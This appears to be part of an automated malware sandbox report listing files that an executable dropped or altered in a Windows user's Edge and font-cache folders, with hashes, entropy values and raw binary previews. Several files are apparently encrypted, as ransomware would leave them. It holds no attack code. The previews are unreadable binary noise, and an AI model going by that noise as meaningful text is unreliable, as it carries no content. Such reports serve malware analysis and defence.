                                                                                                                                      SHA1:261D040EF09C9231E210EF5E6D69D1F7CE4FC6F7
                                                                                                                                      SHA-256:EC5DAC12710476C2CACD88B09F60549C73684606E4316766C1670A0B5096876D
                                                                                                                                      SHA-512:4A73616A3DE28442F18238611355C6B579872E8D3CC24C530F59940DCD0F0E2051C9173766656803EB8C9E331BF6F8517C9C99EFB5BC5369ECCDBB55A19416C3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@..\....f.I.~K.7..K.8}.5..5Z.....x......V...e..r.\..#..).K...~.0........: ......EM`[.^..7;.........=2..).^.....".....CC..a..4.y.Q.p2....p*9hK=.';.2.>.inZ..w....E.k....Y<.......}...i..'...q@....L.#......_...BE..CKD.C.q.@......B[.z..u.VI.....:j.....c.0".f3./...i`l.;u.s,....#..J.o....)%\.7..RuR......N.m4bh.pCN.`a..&.f.h..Esv...^...W.O ..Cei.E..&J+....&..{7M!|pE.*.iji.....E{..3.=..G..0.."3y......@|......6.6a.b..T...lA. ...:.d.FCvyKc....g...s_.....y.Z..Q0..7zP....{...X.Y.......m..'..g....a..3.r.g..m..$[j!9.|\.....e..Nj.8.S.j..-%.?...{..h.%...z..Y..O).....m..V.`.i..W..F.-........5.....t...22s.j.=>a.+.wG$.z...l..[j.n|....".:.C(a%zQ..n.?J)vu.....Q..rn..... .%....&}..F.*5.=}.K..e.i.O.HV/..........vX...m.v.....b.(.......O.-3..B..........l.`.<....A..;...kQ-..0.G.....?x...k.i..t.V..:]............y.....*.o..^.<.....f.h,...c.zZwLt.z.....*.O.:.....N......._.d.F...LJ..#.f!r.?^h.....!.Yt..a.a+H.......J.f.qi.JAi)L.Q[.....@.r.0TJ<.Q..X.+.A/C*gow.2..i

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D23AD-1560.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184872128699428
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:P2ldq6KldgPBJJzjD+IxFDYxBqZPjt5RQF:PqqliJV+elCiRQF
                                                                                                                                      MD5:E183FA01FDF795495F568FE10A314225
                                                                                                                                      SHA1:029EF248FA07D35D9A943421A06F89D805ACF97B
                                                                                                                                      SHA-256:32588DD54AA856942656AB99BE856179F5751413D6EED5E41576ADA189F87ABA
                                                                                                                                      SHA-512:39FAAAA0721DFD4703F9C740175C5FB7B7AC73900EECACC1269EB043DD720A72AD83F6DD58F79EA5C090820981D795F59966DE8E5CFA381EA42BF6EAB5463373
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@..e...0..;.}.g4......]/......s.>.@.b\#..u'.PF6......t..........@.....6.?..T....w9J.=&.q.u..;,.A.'o.BS.Y?*..t..`.6...`.3..+..\.!5....iq..%#,4.....p{3.J...P..f.....v.-..S.....T..d~.:...U`...Ac..K..\..~H.@....q1.,....D..*.T...........<...O.....a..Z.DJ*y%@.Y.oN.b.}fc.kiq.;._,b o._h.QF...6..0../\....,6U0.1..%.......,x...=....M.g.ji...i...*.......f|....G....H..Q' &5......... .S.^\s...........NkL$r~.%..#N..P.3..1.O>T...f...c......T4....IH.4../...Tj.z..Vq.I...9.....$.....}..A.x..iI...r............,.TN.....&...$0;..8-O. @t..~...KL.N.B.C.Yl.[.T.).P...>.Z,..[.=L...i,j.)E.......S.p.. FB....IN.;....Z...go.].X.}m.N..v..."......`$..t9.Fk,...'.C.Q..b..;..x..|./%..9...]...b.T&*.A.....*p.....oA.......{.a..7Km.&v...g:m8...5j../Yp......'....Lb3e.N7.........!...Q. .c....}....G.b......."..t..l^.eOs2..g.....v.2...;EM+3.".e...u/r..."H..PF..4...O.x......l..*.(g..W=..f....a.... .W..|...W...u...B=.^.......a..!..8e...O.D{i`....2..a..i2.-....:..z..Ko>/..XkQ.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D23AD-F98.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185161201415908
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:uPJbQZKm2dVC2JYxc8HzEMe/7k+kFplxzFOn:uVtrVC4YxtHi/7RSlhQn
                                                                                                                                      MD5:4204402DA447A0B619DDF033119BE763
                                                                                                                                      SHA1:89FAAD1F0FBBF691176D032C91D9362C7FF2D714
                                                                                                                                      SHA-256:CD87EEC1590A22D3C77E997C71392E8D5B665510D2C4DD5ED508B1CE72367756
                                                                                                                                      SHA-512:F7C3FF2E69ABB6249A9B8B3661F48B057C04A99CDEE1D8B0E2EE04778771CA34A05324620E0E3BF6469F218EBA04330C2EB6F4C5B8659F9EADC52256F5F248AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@......)x.`]..'.1......|?.%...@.7X.Z.^5zw-...._-=7..........0.. ..u.h.E..m+.;U.".qCQ.J....sm....m.\....d.$..49!..../h].$......[...?k.8G.....B..H..,.Q.D%...Tv...V.]..@&...C...X.=..._k(c.C........Lvg/X.....^.u... 3.{R.e#6\Z.`r...i...W.F.9}.....B.M......!x.L !..u...Ik..l...\...b,...........S$...C..3.I.......=..1.w...$...s.lcEf.Dm.3.$.J6..\.|v.,wu..D..?K.k..x..S.B.^......*q.Oj&.p.9...).`.~..B.%.=...z.O1^.q.S..(...jd..=b[@;S.p....KE..g\h.......F f.....l........./.d7......m..s..P.g.bK..y.zy.k.[Y*.O.............5....>.5.5Y...vv.NOQ.5*HV.G.@..".u..(...T.......E..h.8.....C.W..>..E......."..Z.VXR..A...1yk..j:|...9..X:=.%M-h...vU....D.%-......[U2........>;...b......2...........E.x.+...:.^..'y...C........x....XIl.c.....\!.V.G'.a..n..!..Y.30....R....r..y..-.tl...b..N.o.r6.S..+G.[.C|.K..........Wwb.;]`7\......o.h.WU...0.._..{t.x.H..!..:`...A.......wk.._t..N+......U..p.h...Ux.z....0..pP9.;=4.!-|.h.X..AP....k...Z...N....6.............k..@..2=P

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D2470-1A5C.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184185968921716
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:49umJPLRvJ7360YrxsbvmVG2IyQp6qiPUwGNKWjwvCri2Yp:43vJ7Qrxsj2G2lUOPRG6iw
                                                                                                                                      MD5:FB8AA912073027594E04564BEF6881FC
                                                                                                                                      SHA1:E3B1AF92F94CB1C8041E2548D933DCF214E96136
                                                                                                                                      SHA-256:78F861AFE87194A8066438F8EE8885C8D0EE316ED94C6041E703124A3F0BB3EB
                                                                                                                                      SHA-512:48CE9A882A76479415EE42FBBC768DE35B5145FC10737B39B461151B1B6E5D535CC6298AF446BB0CCE8F9373C7330D8BDF3FC5514A3FE05DE1717B5F56157398
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.h.....[...9..B..Z...!.u.F.....^.l%u....J..[..}.K..i..+.a3..j..]..).9.O...OD..A....+K..F....U.T.|.....|.j|.......$.......g.......0j?...mQ..&YP.58z..;K)..4.>....2S;...........sLDa.q}.;3..R.qY.O/..J#...n..Bxp.....a].z..#...dx-..j...g3.'}...sDw...B.C..1....A....B...={.,P^..C..........V7.....#........x.t......Q...D.V..4\A.B.K.T`..=.} .dc-.5.R......j.......J/..\...z..10.........>.=....c...y (..7."e.TU.oS.....:.u..2AI.....C...S....J...[......:,...W.5..Y/LZ..=..f\iwL%.NZ.....L\.E........j...e......&..O..4.......w.7...6-.Z1X../..@D~#...F......8.z...T..=b..'L&.....x^.p.*....}L..,.".x..vp.O...vf(.5.....m#....e.%.I..#....;.......4..}$3X........:L.b.&&.\Y.....A.-.[...w..e..%.T'..c.0.6].K.6.0..b4K......f.r.(....T.).DA..l.!..c.9..b.QMv..:).l..|..3i.0....:.}..Cvq5,.9Nr..gD.7...F....;T.$].p..0;..K.jx..8.>..F-9.c..........[...E-...a.....&f`B...+..X..%.R.u(.9.GE..,.>+H2Q..27w7H`...Q..>0.<..h.C...m.....u.?...n,Y..'W.I#c\./ ..l......\D..I......yR....<....d...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651D2470-6D0.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184505113011346
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:BqK5BwvKeocO+lu/aNWc/Srg/pH1Tlx3F5YVdCf0yihOVycPRebQ7LtLRJX42vL2:BiWN6YopH1Bx3kSuhOVyi0bQ7LtDu
                                                                                                                                      MD5:41D2CA67187BF7949F0491F50AC67B34
                                                                                                                                      SHA1:7619525880A1C1030E8865329626CB00AEACE036
                                                                                                                                      SHA-256:7E2AAB559F7EA203F0B65471DC112C222B05BCD560A12A7508FD54E6086C3FE2
                                                                                                                                      SHA-512:06AD5165E3BB75C52F9173229228B391DB5DDF418B5AA69962D150E2B04680EEF76A5D6AAFB775CC5348D59F59073C7D38BEE7EC9593C924ED1968B16699C145
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@..c..^....)m....;0.nYt..?.......;..I.1.&.m..1A..p.....^....f.......^2....A[....Ms.ZY..I..e!y...J=p...$..._{.>.x...TS...tAt.z...3o..:..n..Y.].d{...p8...S5.#.|..C..oq.\....7[.....g..B..[@*V..C..z.]..^-\........(...S.U.z?=..T....S...E.J..W.|.iw.....>.K.\... ....u..@gB.K2..7....C.Ef.i.gy..d.3I....Q.....(.:DB...5!x.@|O.}[....9.9=......."=....n....~......l..-e4..z.r..w9...........Ims.VuYq.a.....B..b:c.q#.Q..|!.V.=.l..u ...n...w.E;l....w...Fk..`K.v.....-...../..)O.,...5..%.-.:,>M3.o.".IB...L..T.GI.}_...O.i..7.R.......h.<q..fx.!....C.T5[L0...e.w.......`joNZ.7....W..Y5..........*.N..`./"m.(.=.......V.S.J..M...h.(....sg..N..*.....Ty,u.....U...1.3.9.Q.B............{0......n. ..u...ByC....\.E.........-.Et.....q.g.C~..D....l..2.j.i..U..}.....:..$n.l....H....U..<u ...O.q....b`..W...O..K..F.LVz.SU.Y.u.......=*./j.).?...^..J.*Jg/.(x@....O..+iz...j..Xye.9w.js.a]..C.E.W...jH..Q....c.....<.....1......Ne..F(..Em=.W*V.]C.k..f..2.6l..>.-..C.C6..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E5F5D-13E0.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185822107913681
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:EYbZOemBd4lTucHcq0FX16QmEv1AGDr9b8ikTeoAQN:EYsBClTJcqAX13vNrrSp
                                                                                                                                      MD5:4D41415AB703A2915BDCD0EF2D78AE90
                                                                                                                                      SHA1:2FE3B8998A6EF3CBCCC5A313DD453528B246DE6A
                                                                                                                                      SHA-256:482C1573F5CEA542B0AF8F4BD2C1FFC2AB81EBF09746ECB2F7CD0D4C64A2901F
                                                                                                                                      SHA-512:505E1D68E2EFB9A8D2D24AB162C3AA8C5528C318102E66DA2B2C1C0A76C79AACACAA6D2DBBAE8FBE221E4C1BC049100B95E9FE17FA69428F22F282FDE2185D67
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.i:.....lF....O.#m......VC...4~..."^..z...lK...........B.c=O.]l.p..q..k....HZj..=.=\F..mb.<Q.J..=.Q.......k).E....E...F..U./....<.s`9ob...x......*...e.Y..L.....N.$.R.w..Q.....^.../..z.. q.l.R/.t.u3.4.n.s.V..m.....R.......r..:.u.<.+..~.y..nNXs......+..Q6.@...A..{9.....=.'.F.Y....0.....l.A..k...#.)<...2.......H...c...I..K.......\o.q.]..6:.`....9....,5g.i.5.N...(...x.......A..../..#..&.a.K>.Z/..Y..2.m3V..y....)..%3b............+...-.3F*.-Z..3O.4.6.......6oe.n...a..7.{....Ag.H....c...g.pQ..f|M.*0.6..N.;.H......6V...!........."u.....)........%..~7q...?.....C.~\j[Y......W).U...V..{.EY.E...=..."X...E..i\"b)....vF..r..*.$*...U.?..:."......%..|./.U.*.[.`.%.c..N...N......u............a......$i..g.Z.@K...GP}.Z...........1.z.>.D.&PF..rDU.....T.+...Z.v......9..!.B...0U..7....Y....%.j97/..M$.......".s..{........'..o..>bf......;..>...}.A.d.$!.O<..#.P.2.....J8....;..&.UB!..n.7.)...F....^v#+.}/..mS....sCX..<.2.........} ...|.Yv.^......-.91aq.H...a.?-.T...gw.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E5F5D-DE4.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5184607198275544
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:dzh82M59xIfppYhTao5rGoscVvFP1Th88v9UM2:dzhbQXIf+j5rGBOFP1V88K
                                                                                                                                      MD5:12CFF213C3D694493A7738FD218F1E1D
                                                                                                                                      SHA1:BADA1910D5C586BC631349415B785CC94F7F4DF4
                                                                                                                                      SHA-256:BDE9615A163AD0F7C1A45B52CE1665988C322918D6747770E9E595F649E9D4AF
                                                                                                                                      SHA-512:FF7E04EB09973642A397F6FB528D82FDCD886B21E70F768426FA9D2D7EFE32A80DD0FEF38C979967544537032F4E88BB6B77257B6FB8ABC578A5D147389AA88C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.v&t.01.g.O...3..Q........(b.........9....;LS.!.o....\....[.&.....T.fe..z.2.'.H.`...'.....qs...*..Oi &..}..A..&mW.........6....c..+.=PU.v~...._.a../..MI..*.....R..Hpv..d.?F.6c.N*d.=24..!.. ...O..<1....%QgI... ..Y......g..jh.C...t._...Y.C.D3..<x.1..../>. .....,G...6.[..'X...lOm.]F.Ao.}.w.o..1fi....?<.#a......q..8..&.&..)o......Y`.u..m.......o1...z2....A.[p..O.&joJ.x.....}.+...:.7.I.&$0Lht...|....u...>Q.x....mM...G......4..?..j.....B....w.$..E..Rm.hW._W.%.$.%VG.....%.)'T*}.. <.0Dy:A.......M1.Z..........pX......'.Oz...;[.>..L.........g..&.....}...!..z1-..1cv...aCn..%h......>...`.n;..4O..jP.U_...6.<...u."..zm.T;...e..t.(...4.(...j.....:..Q..7.!.X.W..a X`..r.>..k[TA.UO.M...#.....&.h...u>.N%D:..6..m.1&.~.*..h.o...a......J.0q....[.;bR...z....d.....*....|z....^..\...\.............t..*.....T.xN.....z..R...c2....Q0.}....r......X'.<:........vf..^.c^a.....`..s..Z.:L..e^..'....M...S.Z.L.:E.i.\KvTG.1..b@.Z...:.V.<!."..Xf.J..ik.4..\{K...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E630F-1A04.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185219465519861
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:/vwOg7FTNO68j1zLAZbIUQDK5/21kJwEwPqW3sCD3AS:Xc7qvj1CbbDeCfCAS
                                                                                                                                      MD5:9045E1CB8288F23DA8B2649A6AB1B71B
                                                                                                                                      SHA1:043181F68A166325BB3458779DBBA4BBFCE1B762
                                                                                                                                      SHA-256:C00BE5654EFB4C8771CD67BB170948AF325147EEB2EECF983EB3F1F4359E992A
                                                                                                                                      SHA-512:F35B097FBCC3D2FB7870B0A2C3DC69F4ED2CBBCE1EC85FC0721F5D4A4E0C06BB729B6B0F012D429697987EBE75C6EE405F0A2A8CD09C3A737D51C50AF8DEEA9C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@.......)..@Z.U.Y.l.%~O.'...W.C....3.}JN.V...1..&.....JY...P.ISh.o....3"....yf.N.1.8..U`M..].......=EjX#.}._6.../.....M. .U.MH..d.......UL.^.X...l...~...r.M.z..s:.{.....?2.S..yse...gi..R.8.o......s..\.....pmh.~....`TA.&.I..uz......{....6>.......QE...u..1=.C..pGSd..,..$.J.%j.m..q..R.].j...bGb^u..JS:...!L.!.m...........x..;............Q.^.....V..y.>...[%...M..1m..CSfr...%.k1=.O.w.F..!..5k{T..>.....2...F...?.Ili..1.(..h9....P<.>..!.".C...L.TS.{..._.|..i.,.gh.|,...".......Q~.n4..K.....0F...m.em.....+.q.......I_.8.:.......Il......<......:L....vm=tj.G...R'O.n..;.....Z.ug..yp.i...hyM.X.[.....B......J..y.._r9.4.Z.....'...N..e.t.v...j..#E....].......hh..y......&....U.haM.+...."....Fj..M".|.A..+......9...,`...'......O/+..A ..h........%.@...i]....xoc...'.&rw.*...>....y.8......N4....8..O..W....P.h=T.s@.J.z..iOY.'sY.~.[8.S..(e.s.ZP6,P....o...4x0X..}.7./.\....v.._..'cN.P.`.^....G...1..Um.[..C.0..`.%....t.G:>;..R.....2..Le.....k?..|..R.......).%....E^I...+

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E630F-1A08.pma

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4194638
                                                                                                                                      Entropy (8bit):0.5185128002842853
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:ROjdETfljW8a4sa8cNSgABVRVnfipW3hv0WcbfuHoVutAj8hONbsyDmS:REfKN6B/IpW3hv0WczuImAjxbN
                                                                                                                                      MD5:BA5482DEBEAC937BFB9014A87AFD32BD
                                                                                                                                      SHA1:1C5C4881F62B7D34021C7A7EFA7ACB7161072D80
                                                                                                                                      SHA-256:627B6121ACE29C7E2D24B701814EE925A24F9143D0A7EA5912E05B7BD1894F37
                                                                                                                                      SHA-512:16D968ADDE690891EE5137DF7DA05AA262C2DF9A88722AA33515F6A8EAB068ADFF5C95D1A73C8AB45389097F43FE8A7A89C8E442DBB0B4F85E738099E074C6F3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...@...u..`.o2...?n.sG.-...O...D.#.3.X.f0....,..<.......\.-........d......)..*...--b..5I..r...Q...A;V\.z.B`@.FA.TU....l.O.y.....TE...!.y..].....Lm..B.ru.BodR..` ..D...`UP+..H{.D...*Q.zr.EHh..|.z.N..\.%Kg.....M.....E..6..n._...'..:..S.".....6....G._K|E/^.^ .j.'.....T.)....../......k.q..bz...[.h...>.[.....{.$..qUlEN9..L......P.....Y..J.8......o...PUyE.kB.j..0.Ad..r......N\._....>F.CN....}...."F!......8.HU...HA..$*..k.G..e..[Q....&AS.Q.Q.m.c2..5F.l.z85y.!..r..3.!D.TN.(3...........3...R.?>R0.*\..........#..u9.........}h.VC.q.....Tg.o..:...n.....7...o-..7p..X...5&.....C.S.w...?%.~....D*S.Gbr.rs+.L...K..$6....~.$vu..>.c7.......?.W.U..(...$.+.O..v}.....c..u.....^64.....SQ{.?..X..A.Uj@............kC`..DB}...].v.....Lk...J.K]..8....].nv_..9p..../.]...n..3.......4.ZO......{..hL.o|..m#....I.?..t'. i..'.i=......7.r(9...D..}t..cH.uL./"x.......AI.u..2..F..Z...j0.........k.*w...>......eh...Y..|w.QHN..jB[./4..d+.7..&.r..v5..B.....%=$..i..]VI...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):614
                                                                                                                                      Entropy (8bit):7.5780048909998845
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:9/ybW0dnLNnLFexxV2mte8TCeXtRn12CVID++ZSwpzpnI7+PukIcii9a:NyCmnLNLFa/I8TLtR12C+6cVI7+UbD
                                                                                                                                      MD5:C418D95A6560D15504AB0E11C33A3D2D
                                                                                                                                      SHA1:4269A0208C20147878143532C1C23443DC29A5DD
                                                                                                                                      SHA-256:2BA435791862824AAF9AA067F1AFB3199F080D1755779D15583793E15B061DC7
                                                                                                                                      SHA-512:77FCEB233C8C5939116327C4358F9DC25BA3A9ED4577A713C711686A062D3D124A8596956DD7792A07D0F005BC26FD5F02128919646508E0A2251C293B39E510
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:sdPC..}v($..k..^...>.....u..#.X7....=F...?.oh3pu.....B..,.....C>..F3.pA]....&.",..39..57m....&...#..sp.X....F.+..n.."6O.N...B^3......3......d....8Y......I...:........Ga....<E\./..sK.JO.G..6C.t...x?A..v.S..o2.w.{.W...g-_D..b`d^....\F...#:...p.zB.<...../....."_........O.~.z.?f.Z..8..X.......F.>......A.HwT....LM...o.......s.(..,.R9+n...4.......1....*.>.?.ph.J.'..}s."....i.[}...WQ.o.....E}n6.x..Yb.1.\...2&...R....Y,..{`.jL.wrL.>rN(..[...d......jc...Xo..........tm_;.0....C.M.Y..99_Z...B...2-....U.Y..Y@......`...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Crashpad\throttle_store.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):354
                                                                                                                                      Entropy (8bit):7.2402834910135985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:8YfRxNa4Izsayb7nyESwITXQquXFNW1xYRRQKorp1TD3ukIcii96Z:zf9a4IzsaUjyEtIbTA/WHYRdorbTbuk6
                                                                                                                                      MD5:92AF9E5B16B17D7520151EE4FE3439F0
                                                                                                                                      SHA1:7738F88112592484A83EE3157DE192FEF1ADF792
                                                                                                                                      SHA-256:2D07A12BC4E7CDB9A1C02C7B7563444DFDAF193192B1CCABD088A5BB0996E975
                                                                                                                                      SHA-512:0037A45415E37CCAAA33DEAE54A17A98C3AD9F1AFB03A0B3EE14234A0D6DC484A4E7B0F309D045D89D6132D6882675AFAAED1A7C107BB4E754B46188C39FEF4D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:level...7).:.~..-..I..x...^b*$8}.0Y.{v;.-.....W.\...y..6o*3.9.......:.4.k..?.L2.....u.`.9...&.U.~N...:a.../30o.%JR.=..8/.ydL9....[+.3..e\..MhM......./.8NB.....D...6k.HyI.k6....,..q.........;.8..GBqV.....[2c..,..Nq.#..r7.@....Nz..).j....A+.c..er.`...<.^.@.{.U.5ktp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):72091
                                                                                                                                      Entropy (8bit):7.997653340188829
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:1536:+rL07fJ379kQE0q/yZ5ILQHYDRiZ4qxvafPqYcG4kPeR6Y39:Gap7HbvIlDRiZDxvafPqS4kPeRp
                                                                                                                                      MD5:B8EC5AE259AB55F7DF9D7AA2FA4D07B2
                                                                                                                                      SHA1:2DF7EB011596C86968A8788D286D9AEC354BA54E
                                                                                                                                      SHA-256:CBBBB4C92520006A759F6302BBB9594205FD2D044F2B38D9F200E4EC880F6753
                                                                                                                                      SHA-512:EC432A6610EEBF667AD268C5F7CA2530DE2AB47DBF5E2161E339F95394775DE43102B65851D37B3E89177ACBEEDED1C550FE2F8D1F155A02E9BF0E4606A44457
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:......$0.....{.....7.J.*._>wi...u.......5...... ........b.W.6.a.v.`...0c.(D......m.#.e.....o.5..f$R...d8O..$W.......u..v.Nz....X.; .A.....sT.U.>.,......0'...l....r&Y(j......M.-.m..{..R...U"..sRQ....a.ar).F.....b.d.m...x.....r...\).....8:)q.~...H)...L.).d..u...<.1>([..*n.....n..H....k.....C.v?C....z..U.[..[...?O......./...T.._[...y/....V.`c.F..)c7...x.d.....[..1..g8.`..|...y.#sU%....+1|..2..Y.c..`z..+o.K._1FD..`...Y..C.+c.)I.S...l....z4?vk=.H.........7.u4..i........2..qz.BDc.<J.)A!.'...yv.3(..-..7..cV....20.>L...9...*. .[";fv1.=n.M.N.C.....K....)~.".V.A..e.\-5...=....YHP....z.h.t.H.z1[.Hq.......;..3...Q.gV.....DM...%.K...%..Q..X...7.O.>m......@.....x.f.^95..l.`.o......Pm.X.Yg"%,.l...:=..a3.Z.Y..N*x{FT...6-A...sd...b.[n..t#.a....Zv[...K..d...$oB..a.ey....l.a.Dg../............>(....,UP.(>..J...V1k..d.x..n..7..|.f.....QH.u....y.......a....i...JN..].:..Yp...@..i..!2;.xk.E.>.@+.0.9....8&.{...3.SH....o c...Sfw.r.%S"..s....*F...VV.&..mF..0...}1q61.:.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45390
                                                                                                                                      Entropy (8bit):7.995982507890136
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:768:zt/BbEPhE97u7sm5JdRe5ikiz6iNx8p9909jnx4V4wkUWi5e:zPChEZu7nLdRe5sR8pghx4WUWH
                                                                                                                                      MD5:BF8BD1827400DCD31DEAA564C4F76595
                                                                                                                                      SHA1:4A7CE1FFE0B2F73579816E26E8373A5ED7F4ADD2
                                                                                                                                      SHA-256:223E83245A883FB3202CBAB180D8900E8879BD90A4138F306B7CCB6F1E9A6F8C
                                                                                                                                      SHA-512:55F290F20F5852FE4E91E181B7C6552F0D32505532CC2AA2183B5E9D7104028A455EF1D08DA65B5E5231A5557640CF3F18CF9B659C723D8606AC871781FB6B9A
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:SQLit.r.3#S...x../..u..1&..c.K..k....W.c....z.U.....,..5...e.. ..%...M..A.........?......edy........YdS%..x.1t..3..R^.m..bj.c#i...`q.y...).mu]...l....zA....F.p...... -....NG.b.....q.iB...c.bf....D(....gfNa....... ..x....|a.K..<....3...|.t...K.u..OF....{.'G.......2...JF..!|....;..U.m..$4..........F_......m.d....0b....ByR......d../..'4.I.P\.(j.K...>...L.FM...J..[.s.&.J,I$..s..4..(`.,.o./...#...x.b......_.. .e...S.k\....6~<...#......*....W.#.<..7.q.b.F.R.+..V.."....Q...........+,?:...\$.o.THTI..D......9...,..\..@e....A{...._.P....:c+.s.G......[...V...8\.k|..m...l2...0.\.M".9..Y`.V/=P....@o.e.z9.-v.]...0.."N...t..W`....X...........E.}!P...f....fA_E..=z.r.ib..y.em.1.2....-.......)'V._.A.........8..e.....).T..#.!..u\...V.....H.)!I.a...bH...)i..sR!..*A...-..eU.Q....*.F..r.#._i+C.GQeU<.i...d"#..nXfn.U...YJ.`.b..PM....`..vx.h?......}f.M....D.?...&%2FfR.{.q'9PK4.TD.......e4X.Pn.!..p.^P....~.....,Mu..pCv...9....5...#..m-..?...9+..WGc..$...k....o

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):503292
                                                                                                                                      Entropy (8bit):6.444004970266326
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:CdCl/bYxxqgxI0zEa18prHGZg3gc+6f2K:CoxbQzrzbipLGq3gc+6f/
                                                                                                                                      MD5:41526DC892AFF1597283E6938044EF6B
                                                                                                                                      SHA1:F76B74E6A0C00DCE1EC0DAC5B1608B00AB4C4030
                                                                                                                                      SHA-256:D4B348E917E2FF63891FF3B8A87D5336B7F19360A18948C84B62F4615C554438
